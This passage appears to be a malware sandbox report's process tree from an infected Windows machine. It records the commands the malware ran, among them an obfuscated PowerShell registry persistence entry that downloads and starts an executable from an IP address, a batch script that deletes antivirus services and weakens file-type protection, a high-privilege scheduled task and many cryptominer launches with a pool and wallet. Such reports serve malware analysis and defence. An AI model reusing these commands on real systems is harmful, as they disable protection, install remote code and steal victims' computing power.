                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding B2A06A79CA50066364C4E7B88BB4B96C E Global\MSI0000
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1360
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A303.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A303.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4992
                                                                                                                                                                                                            • C:\ProgramData\Runtimebroker.exe
                                                                                                                                                                                                              "C:\ProgramData\Runtimebroker.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2972
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91''+''.241''+''.19''+''.52/Ru''+''nt''+''im''+''ebr''+''oke''+''r.exe''),(''Vpnm.''+''e''+''xe''));Start-Process (''V''+''p''+''nm.exe'')'
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:7840
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    "powershell" Get-MpPreference -verbose
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:8144
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:7140
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AD55.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\AD55.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:6340
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\AD55.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\AD55.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4212
                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                        schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\System32\WindowsUpdateElevatedInstaller\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:6936
                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        PID:5216
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:6652
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D996.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D996.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:7044
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:7128
                                                                                                                                                                                                                                • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                  -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:7752
                                                                                                                                                                                                                                  • C:\ProgramData\Systemd\HostData.exe
                                                                                                                                                                                                                                    NULL
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:7604
                                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                      -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:7760
                                                                                                                                                                                                                                      • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                        -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4108
                                                                                                                                                                                                                                        • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                          -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:7580
                                                                                                                                                                                                                                          • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                            -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:7864
                                                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                              PID:2300
                                                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:8112
                                                                                                                                                                                                                                              • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5220
                                                                                                                                                                                                                                                • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                  -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:6176
                                                                                                                                                                                                                                                  • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                    -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6060
                                                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                      -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2240
                                                                                                                                                                                                                                                      • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                        -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:7596
                                                                                                                                                                                                                                                        • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                          -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4508
                                                                                                                                                                                                                                                          • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                            -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:6592
                                                                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5284
                                                                                                                                                                                                                                                              • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4272
                                                                                                                                                                                                                                                                • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                  -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:6136
                                                                                                                                                                                                                                                                  • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                    -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:6048
                                                                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                      -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:7964
                                                                                                                                                                                                                                                                      • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                        -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:5552
                                                                                                                                                                                                                                                                        • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                          -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:7708
                                                                                                                                                                                                                                                                          • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                            -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:2124
                                                                                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:6296
                                                                                                                                                                                                                                                                              • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4168
                                                                                                                                                                                                                                                                                • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                  -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:2280
                                                                                                                                                                                                                                                                                  • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                    -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:4928
                                                                                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                      -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:6648
                                                                                                                                                                                                                                                                                      • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                        -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:6392
                                                                                                                                                                                                                                                                                        • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                                                                          -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
